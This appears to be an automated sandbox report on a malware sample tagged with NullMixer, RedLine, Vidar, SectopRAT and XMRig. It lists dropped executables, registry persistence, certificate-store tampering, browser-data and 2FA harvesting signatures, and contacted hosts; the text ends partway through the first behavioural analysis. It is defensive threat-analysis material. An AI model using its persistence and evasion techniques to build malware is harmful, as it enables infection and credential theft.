Malware Analysis Report

2025-01-02 06:06

Sample ID 241125-ljerxawmgp
Target 9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118
SHA256 befd232ab8dab62c010a0a96e0e62a1ff561509877fd8acfa1507df11e092aec
Tags
nullmixer privateloader redline sectoprat socelars vidar build1 aspackv2 discovery dropper execution infostealer loader persistence rat spyware stealer trojan xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

befd232ab8dab62c010a0a96e0e62a1ff561509877fd8acfa1507df11e092aec

Threat Level: Known bad

The file 9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

nullmixer privateloader redline sectoprat socelars vidar build1 aspackv2 discovery dropper execution infostealer loader persistence rat spyware stealer trojan xmrig miner

Privateloader family

Nullmixer family

SectopRAT

Socelars payload

PrivateLoader

Vidar

Redline family

Sectoprat family

NullMixer

SectopRAT payload

RedLine

Vidar family

Socelars

Socelars family

RedLine payload

xmrig

Xmrig family

Vidar Stealer

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

ASPack v2.12-2.42

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Looks up external IP address via web service

Looks up geolocation information via web service

Checks installed software on the system

Accesses 2FA software files, possible credential harvesting

Adds Run key to start application

Drops Chrome extension

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Program crash

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Unsigned PE

Browser Information Discovery

Checks processor information in registry

Kills process with taskkill

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Scheduled Task/Job: Scheduled Task

Modifies system certificate store

Uses Task Scheduler COM API

Checks SCSI registry key(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-25 09:33

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-25 09:33

Reported

2024-11-25 09:36

Platform

win7-20240903-en

Max time kernel

60s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

Vidar family

vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\c862a054a35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\453c5fa76a849.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\4f5baa1083db067.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\53516815d3135fe3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\53516815d3135fe3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\winnetdriv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\453c5fa76a849.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\453c5fa76a849.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.db-ip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2644 set thread context of 1704 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\f34b9ab9db6d16.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\453c5fa76a849.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e010.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{75BD1881-AB10-11EF-9982-5A85C185DB3E} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

